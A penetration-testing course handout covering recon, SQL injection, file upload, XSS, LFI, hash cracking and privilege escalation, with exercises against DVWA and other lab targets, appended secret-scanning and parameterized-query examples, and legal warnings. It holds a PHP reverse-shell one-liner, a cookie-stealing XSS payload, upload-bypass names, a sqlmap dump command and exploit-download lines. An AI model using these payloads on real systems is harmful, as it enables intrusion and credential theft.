# Penetration Testing in Practice

## Introduction

```
Criminal Code of the Republic of China, Chapter 36: Offenses Against Computer Use

Article 358
A person who, without justification, enters another person's account and password, breaks the protective measures of a computer, or exploits a vulnerability in a computer system in order to intrude into another person's computer or related equipment shall be sentenced to imprisonment for not more than three years or detention, or in lieu thereof or in addition thereto a fine of not more than NT$300,000.

Article 359
A person who, without justification, obtains, deletes, or alters the electromagnetic records on another person's computer or related equipment, thereby causing damage to the public or to others, shall be sentenced to imprisonment for not more than five years or detention, or in lieu thereof or in addition thereto a fine of not more than NT$600,000.

Article 360
A person who, without justification, interferes with another person's computer or related equipment by means of a computer program or other electromagnetic method, thereby causing damage to the public or to others, shall be sentenced to imprisonment for not more than three years or detention, or in lieu thereof or in addition thereto a fine of not more than NT$300,000.

Article 361
A person who commits one of the offenses in the preceding three articles against the computer or related equipment of a government agency shall have the punishment increased by up to one half.

Article 362
A person who creates a computer program specifically for committing an offense in this chapter and supplies it for his own or another person's commission of an offense in this chapter, thereby causing damage to the public or to others, shall be sentenced to imprisonment for not more than five years or detention, or in lieu thereof or in addition thereto a fine of not more than NT$600,000.

Article 363
The offenses in Articles 358 to 360 may be prosecuted only upon complaint.
```

### Penetration testing

#### Vulnerability Assessment (VA)

Against the target websites/IPs, use **automated scanning software** to find possible security weaknesses.

#### Penetration Testing (PT)

Against a small number of websites/IPs, use **hacker techniques applied manually** to dig deeper for possible security weaknesses, e.g.:

* admin.walter.com.tw
* www.walter.com.tw
* *.walter.com.tw

#### Red-Team Testing (RT)

Use **every attack technique a real attacker might use** against the **assets the target wants to protect**, including social engineering and close-access attacks (e.g. Wi-Fi).

* Common targets are the enterprise DC and customer personal data.

## Environment setup

### Install [VMware (Player)](https://www.vmware.com/tw/products/workstation-player/workstation-player-evaluation.html)

### Download [Kali linux](https://kali.download/virtual-images/kali-2022.2/kali-linux-2022.2-vmware-amd64.7z)

username: `kali` password: `kali`

~~### Install [Metasploitable2](https://hub.docker.com/r/tleemcjr/metasploitable2)~~

```bash=
sudo docker pull tleemcjr/metasploitable2
sudo docker run --name mymetasploitable -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"
root@ab78fd47c2e6:/# ifconfig
```

### Install [DVWA](https://www.kali.org/tools/dvwa/)

```bash=
sudo apt install dvwa
sudo dvwa-start
```

username: `admin` password: `password`

### Download [vulhub](https://github.com/vulhub/vulhub)

```bash=
sudo apt install docker.io docker-compose -y
cd ~/Downloads/ && git clone https://github.com/vulhub/vulhub.git
```

[docker tutorial](https://ithelp.ithome.com.tw/articles/10199339)

### Download vulnhub

* [DC1](https://www.vulnhub.com/entry/dc-1,292/)
* [WPWN](https://www.vulnhub.com/entry/wpwn-1,537/)

## Intelligence Gathering

* Active - touches the target directly, e.g. a port scan
* Passive - collects information indirectly, so the target never learns your IP or other details, e.g. gathering data from third-party websites

### Domain Name gathering

##### Online tools

* [RapidDNS](https://rapiddns.io/)
* [DNSdumpster](https://dnsdumpster.com/)

##### Offline tools

* [Amass](https://github.com/OWASP/Amass)

```bash=
go install -v github.com/OWASP/Amass/v3/...@master
amass enum -passive -d google.com -src
```

#### Subdomain Bruteforce

##### Online tools

* https://phpinfo.me/domain/

##### Offline tools

* dnsenum `dnsenum --enum google.com.tw`
* gobuster `gobuster dns -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -d google.com.tw`

:::success
Quick exercise - use RapidDNS to search for a website and check how many results come back
:::

:::info
~~Extended exercise - use amass to actively enumerate all subdomains of a specific website~~
(Active scanning may be treated as an attack; make sure your network environment allows it and the owner of the tested site has authorized it.)
:::

:::spoiler Make sure you are authorized
`amass enum -v -src -ip -brute -min-for-recursive 2 -d google.com`
:::

#### DNS Zone Transfer

##### Example

* [DNS information disclosure at several domestic universities and education units](https://zeroday.hitcon.org/vulnerability/ZD-2017-00690)
* [數聯資安股份有限公司 DNS Zone Transfer](https://zeroday.hitcon.org/vulnerability/ZD-2020-00592)

##### Online tools

* [Hacker Target](https://hackertarget.com/zone-transfer/)

##### Offline tools

###### Linux

* dnsenum `dnsenum --enum zonetransfer.me`
* fierce `fierce --domain zonetransfer.me`
* dig

```bash=
dig +nostats +nocomments +nocmd NS zonetransfer.me
dig axfr zonetransfer.me @nsztm1.digi.ninja
```

###### Windows

* nslookup (the last two commands are typed at the interactive `>` prompt)

```
nslookup -type=ns zonetransfer.me
nslookup
> server ns12.zoneedit.com
> ls -d zonetransfer.me
```

:::success
Quick exercise - use Hacker Target to check whether a specific website allows DNS Zone Transfer
:::

:::info
Extended exercise - use other tools against the vulhub DNS Zone Transfer lab
:::

```bash=
cd ~/Downloads/vulhub/dns/dns-zone-transfer
sudo docker-compose up -d
nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 127.0.0.1
```

### Google Hacking

* [Asia University College of Information and Electrical Engineering teaching site arbitrary file download](https://zeroday.hitcon.org/vulnerability/ZD-2018-00321)
* [National Cheng Kung University Department of Foreign Languages and Literature Local File Inclusion](https://zeroday.hitcon.org/vulnerability/ZD-2018-01501)

#### Online tools

* [Google Hacking Database (GHDB)](https://www.exploit-db.com/google-hacking-database)
* [Google Hacking tool](http://160.202.163.33)

##### Manual

* `site`
* `filetype`
* `intitle:"index of"`
* ...

:::success
Quick exercise - use Google Hacking to find out whether a specific website leaks sensitive or reusable information **(do not access the sensitive data itself)**
:::

### Port Scan

#### Example

* [National Quemoy University port 3389 CVE-2019-0708](https://zeroday.hitcon.org/vulnerability/ZD-2020-00253)

#### Tools

* nmap ping scan by CIDR `nmap 192.168.217.0/24 -sP` (`-sP` is the legacy spelling of `-sn`)
* nmap scan all ports `nmap -sS <ip/range/cidr> -p-`
* nmap parameters

```
-Pn: Treat all hosts as online -- skip host discovery
-A: Enable OS detection, version detection, script scanning, and traceroute
-p <port ranges>: Only scan specified ports
-v: Increase verbosity level
--reason: Display the reason a port is in a particular state

nmap [Host ip] -A -p- -Pn -oA ReportName
-p-: scan all ports (1-65535)
-oA: output scan reports in all three formats
```

* list ftp scripts `cd /usr/share/nmap/scripts && ls ftp* -alh`
* Script scan `nmap -sS <ip> -Pn -sC --script=<script name>`

:::success
Quick exercise - run nmap's default scan against scanme.nmap.org and see which ports and banners it reports
:::

Suggested commands and results
:::spoiler
```
nmap -v scanme.nmap.org
nmap -v scanme.nmap.org -sV -p22,80,2000,5060,9929,31337

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http       Apache httpd 2.4.7 ((Ubuntu))
2000/tcp  open  tcpwrapped
5060/tcp  open  tcpwrapped
9929/tcp  open  nping-echo Nping echo
31337/tcp open  tcpwrapped
```
:::

### Shodan

[Shodan](https://www.shodan.io/)

Shodan filters:

* `D-LINK`
* `country:tw`
* `net:140.112.0.0/16`
* `port:3389`
* `http.title:交通大學`
* `http.html:交通大學`
* `vuln:CVE-20xx-xxxx` (Small Business+, $359/month)

:::success
Quick exercise - use Shodan to search for a vulnerable service you are familiar with and check how many Taiwanese IPs expose it
:::

### Website Path

#### Example

* [Ministry of Education Chinese Language Subject Center MySQL injection and cross-database query](https://zeroday.hitcon.org/vulnerability/ZD-2017-00673)
* [Far East University Counseling Center IN ARK: website parameter has SQL injection](https://zeroday.hitcon.org/vulnerability/ZD-2022-00092)
* [National Changhua University of Education CSIE arbitrary file upload + remote code execution (RCE)](https://zeroday.hitcon.org/vulnerability/ZD-2022-00433)
* [Tamkang University invalid access & arbitrary file upload](https://zeroday.hitcon.org/vulnerability/ZD-2022-00701)
* [演色印刷事業有限公司 website source code disclosure](https://zeroday.hitcon.org/vulnerability/ZD-2021-00227)

#### Path Bruteforce

* [gobuster](https://github.com/OJ/gobuster)

```bash
gobuster dir -u https://www.walter.com.tw -t 30 -x html,txt,php,asp,aspx,jsp,gif,png,jpg,jpeg -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```

* dirb

```bash=
dirb http://www.walter.com.tw/
dirb https://www.walter.com.tw/admin/ /usr/share/wordlists/dirb/common.txt -X .php,.html
```

:::success
Quick exercise - use dirb or gobuster to enumerate the www.walter.com.tw site and look for sensitive information
:::

Reference commands
:::spoiler
```
dirb https://www.walter.com.tw
gobuster dir -u https://www.walter.com.tw -t 30 -x zip -w /usr/share/dirb/wordlists/common.txt
```
:::

### git leak / backup leak / sensitive file leak

#### Example

* [National Yang Ming Chiao Tung University master's program in cybersecurity department homepage .git source code leak](https://zeroday.hitcon.org/vulnerability/ZD-2021-00727)
* [National Changhua University of Education CSIE official site git leak](https://zeroday.hitcon.org/vulnerability/ZD-2022-00298)
* [National Chiao Tung University O365 registration site git leak exposing AD credentials](https://zeroday.hitcon.org/vulnerability/ZD-2020-00927)

#### Tools

* [GitHack](https://github.com/lijiejie/GitHack)

:::success
Quick exercise - use GitHack against the https://www.walter.com.tw/demo/vul/.git/ site
:::

#### Github credential leak

##### Example

* [Taiwan Power Company mobile leave-request system Weak Passwords](https://zeroday.hitcon.org/vulnerability/ZD-2022-00574)

##### Keyword

* github / view-source
* apikey
* password
* pw
* pwd
* username
* token
* ...
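The keyword list above is also what a pre-commit check should look for before code reaches GitHub. The scanner below is an added example written for this note, not code from the original page or any real project; the `SAMPLE_SOURCE` config file and all of its values are constructed, and the keyword set and placeholder rules are assumptions you would tune per repository.

```python
import re

# The keyword checklist above, expressed as a scanner you can run over a repository
# before it is pushed. Constructed example; not a real project's code.
SECRET_KEYWORDS = ("apikey", "api_key", "password", "passwd", "pwd", "pw", "username", "token")

# key = "value" / key: 'value' style assignments; the leading \w* lets DB_PASSWORD match "password".
_ASSIGNMENT = re.compile(
    r"(?i)\w*(?P<kw>" + "|".join(SECRET_KEYWORDS) + r")\s*[:=]\s*['\"](?P<val>[^'\"]{4,})['\"]"
)
# Values that are clearly placeholders rather than real credentials (assumed list).
_PLACEHOLDER = re.compile(r"(?i)^(x+|\*+|changeme|<[^>]+>|\$\{?\w+\}?)$")


def find_hardcoded_secrets(text: str):
    """Return [(line_no, keyword, value)] for every literal that looks like a credential."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = _ASSIGNMENT.search(line)
        if m and not _PLACEHOLDER.match(m.group("val")):
            hits.append((line_no, m.group("kw").lower(), m.group("val")))
    return hits


# Constructed sample of a settings file that was about to be committed.
SAMPLE_SOURCE = """\
# settings.py (constructed sample)
DB_HOST = "db.internal.example"
DB_USERNAME = "appuser"
DB_PASSWORD = "Winter2022!"
API_KEY = "xxxxxxxxxx"             # placeholder, must not be flagged
token: "ghp_exampleTokenValue1234567890"
smtp_pw = os.environ["SMTP_PW"]    # read from the environment, not a literal
"""

if __name__ == "__main__":
    for line_no, kw, val in find_hardcoded_secrets(SAMPLE_SOURCE):
        print(f"line {line_no}: {kw} = {val[:4]}...")  # never echo the whole secret
```

Run it over the sample and it reports lines 3, 4 and 6 only: the `xxxxxxxxxx` placeholder and the environment lookup are skipped.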
#### Wayback Machine

* [Wayback Machine](https://archive.org/web/)

### CMS Scan

* wpscan `wpscan --url http://walter.com.tw/webservices/wp --api-token=xxxxxxxxxx`

Using an API token lets the scan report more findings: [wpscan token](https://wpscan.com/wordpress-security-scanner)

:::success
Quick exercise - register a wpscan account with [10 mins mail](https://10minutemail.net/?lang=zh-tw) to obtain an API token
:::

## Exploitation

### Burp Suite

* Install and Configuration
* Proxy
* Repeater
* Intruder
* Compare
* Burp Collaborator client (Pro version)
  * [canarytokens](https://canarytokens.org/generate)
  * [DNSLog](http://dnslog.cn/) (hosted in China, use with caution XD)

### Guess Password

#### Example

* [Chih Yung High School repair-request system weak password](https://zeroday.hitcon.org/vulnerability/ZD-2022-00458)
* [National Pingtung University of Science and Technology Career Development Office Alumni Service Center back-end weak password](https://zeroday.hitcon.org/vulnerability/ZD-2022-00462)

#### Wordlist

##### Dictionaries

* https://pastebin.com/jA2d1xGZ
* Common dictionaries
  * rockyou.txt `sudo gunzip /usr/share/wordlists/rockyou.txt.gz`
  * [SecLists](https://github.com/danielmiessler/SecLists/)
* Default passwords
* Vendor passwords
  * Vendors reportedly all have a few passwords they reuse :P
* Creative guesses
  * Wi-Fi passwords are reportedly often the company's tax ID number or phone number

:::success
Quick exercise - DVWA Brute Force, low security level: use Burp Suite Intruder to find admin's password
:::

##### Credential stuffing

* [haveibeenpwned](https://haveibeenpwned.com/)
* [Social Engineering Database](https://sgk66.cc/)

#### Web

* Burp Suite Intruder

#### ftp / ssh / web / rdp / ...

* [Hydra](https://github.com/vanhauser-thc/thc-hydra) `hydra -L logins.txt -P passwords.txt ftp://localhost/`

### SQL Injection

#### Example

* [National Taiwan University EE multiple SQL injections](https://zeroday.hitcon.org/vulnerability/ZD-2020-00833)
* [National Taiwan University TAIWANIA journal website SQL Injection](https://zeroday.hitcon.org/vulnerability/ZD-2021-00353)
* [National Open University course query website SQL injection](https://zeroday.hitcon.org/vulnerability/ZD-2022-00426)

#### Concept

[DVWA sql injection source code](https://github.com/digininja/DVWA/blob/master/vulnerabilities/sqli/source/low.php#L10)

```sql
SELECT first_name, last_name FROM users WHERE user_id = '$id';
```

- id = `1`

```sql
SELECT first_name, last_name FROM users WHERE user_id = '1';
```

- id = `'`

```sql
SELECT first_name, last_name FROM users WHERE user_id = ''';
```

> syntax error

- id = `' or 1=1 --`

```sql
SELECT first_name, last_name FROM users WHERE user_id = '' or 1=1 --';
```

#### Quick detection payloads

* https://example.tw/vul.php?id=3
* https://example.tw/vul.php?id=3-1
* https://example.tw/vul.php?id=3'

#### Tools

* [sqlmap](https://github.com/sqlmapproject/sqlmap/wiki/Usage)

:::success
Quick exercise - DVWA SQL injection, low security level: list all users
:::

:::info
Extended exercise - DVWA SQL injection, low security level: obtain the users' passwords manually or with sqlmap
:::

sqlmap reference command
:::spoiler
```
sqlmap -u "http://127.0.0.1:42001/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --batch -o --dbms=MYSQL --cookie="PHPSESSID=xxxx; security=low" -D dvwa -T users -C user,password --dump
```
:::

### File Upload

#### Example

* [National Taiwan University arbitrary file upload](https://zeroday.hitcon.org/vulnerability/ZD-2020-00761)
* [Tunghai University e-resume page RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00457)

#### Upload bypass

* webshell.pHp
* webshell.png.php
* webshell.php.png
* a.php%00.png
* a.php%0d%0a.png
* content-type
* [file header](https://en.wikipedia.org/wiki/List_of_file_signatures): view it with xxd, change it with Burp

#### webshell

* /usr/share/webshells/
* https://github.com/tennc/webshell

:::success
Quick exercise - DVWA File Upload, low level
:::

:::info
Extended exercise - DVWA File Upload, Medium level
:::

Hint for the extended exercise
:::spoiler
Change the file extension and set Content-Type: image/jpeg
:::

:::warning
Deep dive - turn the DVWA File Upload into a reverse shell
:::

Hint for the deep dive
:::spoiler
[PayloadsAllTheThings reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#php)
```
nc -nvlp 9487
php -r '$sock=fsockopen("127.0.0.1",9487);exec("/bin/sh -i <&3 >&3 2>&3");'
```
:::

### Cross-Site Scripting (XSS)

#### Example

* [National Taiwan University Reflected XSS](https://zeroday.hitcon.org/vulnerability/ZD-2022-00202)
* [HITCON ZeroDay svg file Stored XSS](https://zeroday.hitcon.org/vulnerability/ZD-2018-01230)

#### Payloads

* `<script>alert(1)</script>`
* `<script>alert(document.cookie)</script>`
* `<img src=x onerror=alert(1)>`
* `javascript:alert(1);`
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/xss_payloads_quick.txt)
* a web server that receives the cookie
  * [XSS hunter](https://xsshunter.com/)

:::success
Quick exercise - DVWA XSS (Reflected), low/medium security level: make it pop an alert box containing the cookie
:::

:::info
Extended exercise - DVWA XSS, low security level: steal the cookie (without an alert box)
:::

Reference commands for the extended exercise
:::spoiler
Catch it with a web server:
```
sudo service apache2 start
tail -f /var/log/apache2/access.log
<img src=x onerror=this.src='http://127.0.0.1/?'+document.cookie;>
```
or use XSS hunter
:::

### Local File Include

#### Example

* [National Taiwan University College of Law website arbitrary file download](https://zeroday.hitcon.org/vulnerability/ZD-2020-00271)
* [Asia University College of Information and Electrical Engineering teaching site arbitrary file download](https://zeroday.hitcon.org/vulnerability/ZD-2018-00321)

#### Sensitive files

* `/etc/passwd`
* `/etc/shadow`
* `/var/log/apache2/access.log`
* `/proc/self/status`
* `C:/Windows/win.ini`
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)

:::success
Quick exercise - DVWA File Inclusion, low security level: try to read sensitive files
* /etc/passwd
* /home/kali/Documents/flag.txt
:::

### Logic Flaw / Broken Authentication / Broken Access Control

#### Example

* [Ministry of Health and Welfare expanded relief application system CAPTCHA flaw](https://zeroday.hitcon.org/vulnerability/ZD-2021-00323)
* [水里順昌農場 logic flaw](https://zeroday.hitcon.org/vulnerability/ZD-2020-00229)
* [酒條通 arbitrary account takeover](https://zeroday.hitcon.org/vulnerability/ZD-2020-00933)
* [GIORDANO order data enumeration](https://zeroday.hitcon.org/vulnerability/ZD-2020-00893)
* [Portal sites of several schools leak account information](https://zeroday.hitcon.org/vulnerability/ZD-2020-00321)
* [FamilyMart logic flaw](https://zeroday.hitcon.org/vulnerability/ZD-2020-00841)
* [8591 virtual item trading authentication flaw allows changing any user's password](https://zeroday.hitcon.org/vulnerability/ZD-2016-00068)

### Command Injection

#### Example

* [Taiwan Illumination Society / Taiwan Power Company OS Command Injection to RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00130)

#### Payload

* dir / ls
* whoami
* ping
* [hacktricks](https://book.hacktricks.xyz/pentesting-web/command-injection)

:::success
Quick exercise - DVWA Command Injection, low security level: create a file and check whether it was written
:::

### Hash crack

| user | password |
|-|-|
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| gordonb | e99a18c428cb38d5f260853678922e03 |
| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b |
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |

#### Online tools

* [crackstation](https://crackstation.net/)
* [cmd5](https://www.cmd5.com/)

#### Offline tools

* john the ripper `john hash.txt`
* hashcat `hashcat -m 0 -a 0 hash.txt rockyou.txt --username` (`-m 0` is raw MD5, which is what the table above contains; `-m 500` would be md5crypt and would not match these hashes)

:::success
Quick exercise - try to crack the hashes above with john
:::

:::info
Extended exercise - try to crack the following hashes (SHA1)
`86c16a459ecf39fd76a8e750f9d5074c4722f22b`
`39b04978ade0b5bd9065703fc95fe658176046d9`
:::

### Search Exploit

* [exploitdb](https://www.exploit-db.com/)
* msfconsole > search keyword
* searchsploit
  * search `searchsploit keyword`
  * review code `searchsploit -x exploit-number`
  * copy to current path `searchsploit -m exploit-number`
* [github](https://github.com/)

### Privilege escalation

#### Example

* [[Bounty] 電力即點APP Arbitrary File Upload to RCE](https://zeroday.hitcon.org/vulnerability/ZD-2022-00155)

#### Common privilege-escalation categories

* Operating system vulnerabilities
* Software vulnerabilities
* Misconfiguration

#### File transfer

Kali

```bash
sudo python3 -m http.server 9527
```

Windows

* `certutil -urlcache -f http://kali-ip:9527/juicy-potato.exe`

Linux

* `curl http://kali-ip:9527/dirtycow -o dirtycow`

#### Tools

* [PEASS-ng](https://github.com/carlospolop/PEASS-ng)
  * Linux - [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
  * Windows - [winPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

#### Cheatsheet

* [PayloadsAllTheThings - Linux](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
* [PayloadsAllTheThings - Windows](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

#### Reference

* [GTFOBins (Linux)](https://gtfobins.github.io/)
* [LOLBAS (Windows)](https://lolbas-project.github.io/)

## Pentest Lab

### Vulnhub (vm lab)

* [DC1](https://github.com/vshaliii/DC-1-Vulnhub-Walkthrough)
* [WPWN](https://resources.infosecinstitute.com/topic/wpwn-1-vulnhub-capture-the-flag-walkthrough/)

## Learning resources

* [Got Your PW](https://gotyour.pw/)
* [Burp Web Security Academy](https://portswigger.net/web-security)
* [HITCON ZeroDay](https://zeroday.hitcon.org/)
* [hackerone](https://hackerone.com/hacktivity)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [pentestmonkey](https://pentestmonkey.net/category/cheat-sheet)
* [ired team](https://www.ired.team/)
* [hacktricks](https://book.hacktricks.xyz/welcome/readme)
* [ISDA Telegram Channel](https://t.me/ISDA_Channel)
* [ISDA 資安討論區 (Line Openchat)](https://line.me/ti/g2/1NvrKT5EXJ_mRCT-sHwIH-iFKAYJOE4SVy1S-g?utm_source=invitation&utm_medium=link_copy&utm_campaign=default)
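Appendix: the three cases in the SQL Injection concept section above (`1`, `'`, `' or 1=1 --`), re-created as runnable Python over an in-memory SQLite table so you can watch the DVWA-style concatenated query misbehave and compare it with the parameterized fix. This is an added example, not DVWA's PHP or any code from the original page; the `users` rows are constructed, and `lookup_safe` is the hardened form the note does not show.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for DVWA's `users` table (sample rows, not DVWA's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """Mirror of the DVWA low-level query: the parameter is pasted into the SQL string.
    Returns ("rows", [...]) or ("error", message) so the three cases can be compared."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return "rows", conn.execute(query).fetchall()
    except sqlite3.Error as exc:  # id = ' leaves an unterminated string: syntax error
        return "error", str(exc)


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """Hardened form: validate the type, then bind the value as a parameter so the
    database engine never parses it as SQL. Returns ("rows", [...]) or ("rejected", message)."""
    if not user_id.isdigit():
        return "rejected", f"user_id must be an integer, got {user_id!r}"
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()
    return "rows", rows


if __name__ == "__main__":
    db = build_db()
    for payload in ("1", "'", "' or 1=1 --"):
        print(f"id = {payload!r:15} vulnerable -> {lookup_vulnerable(db, payload)}")
        print(f"{'':20} safe       -> {lookup_safe(db, payload)}")
```

With `' or 1=1 --` the concatenated query returns every row because the `WHERE` clause collapses to `'' or 1=1` and the closing quote is commented out, while the parameterized version rejects the input before it ever reaches the engine.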